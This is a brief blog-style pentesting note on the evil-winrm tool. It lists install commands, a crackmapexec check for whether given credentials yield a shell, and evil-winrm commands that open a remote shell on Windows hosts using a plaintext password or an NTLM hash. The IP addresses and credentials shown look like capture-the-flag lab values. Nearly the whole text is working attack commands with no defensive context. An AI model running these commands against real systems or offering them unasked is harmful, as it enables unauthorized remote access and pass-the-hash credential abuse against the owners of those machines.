https://kalilinuxtutorials.com/evil-winrm-hacking-pentesting/
sudo gem install winrm winrm-fs colorize stringio
sudo gem install evil-winrm
works on port 5985 and 5986 as wsman
This tool is used to get a shell on the remote machine.
but before that you can check will you be given shell on remote box or not by the below command:
crackmapexec winrm 10.10.10.192 -u NAccount -p H4cky21
if you see that pwn3d comes as result then you are good to go. you can pass both password or hash of a account.
evil-winrm -i 10.6.0.2 -u NAccount -p H4cky21
evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
wmiexec.py tool will also do the same task.
Avi
Comments
Post a Comment